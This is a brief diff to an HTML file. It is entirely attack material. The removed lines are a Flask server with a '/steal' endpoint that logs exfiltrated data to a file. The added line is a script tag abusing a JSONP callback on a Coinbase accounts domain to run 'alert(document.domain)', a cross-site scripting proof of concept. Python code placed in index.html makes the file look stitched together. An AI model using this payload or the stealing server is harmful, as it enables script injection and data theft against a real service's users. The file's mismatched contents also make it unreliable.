--- a/index.html
+++ b/index.html
@@ -1,13 +1,1 @@
-from flask import Flask, request
-
-app = Flask(__name__)
-
-@app.route('/steal', methods=['GET'])
-def steal():
-    data = request.args.get('data')
-    with open('stolen_data.txt', 'a') as f:
-        f.write(data + '\n')
-    return "OK"
-
-if __name__ == '__main__':
-    app.run(host='0.0.0.0', port=5000)
+<script src="https://accounts.coinbase.com/e_C9bMuv_D.js?callback=alert(document.domain)"></script>
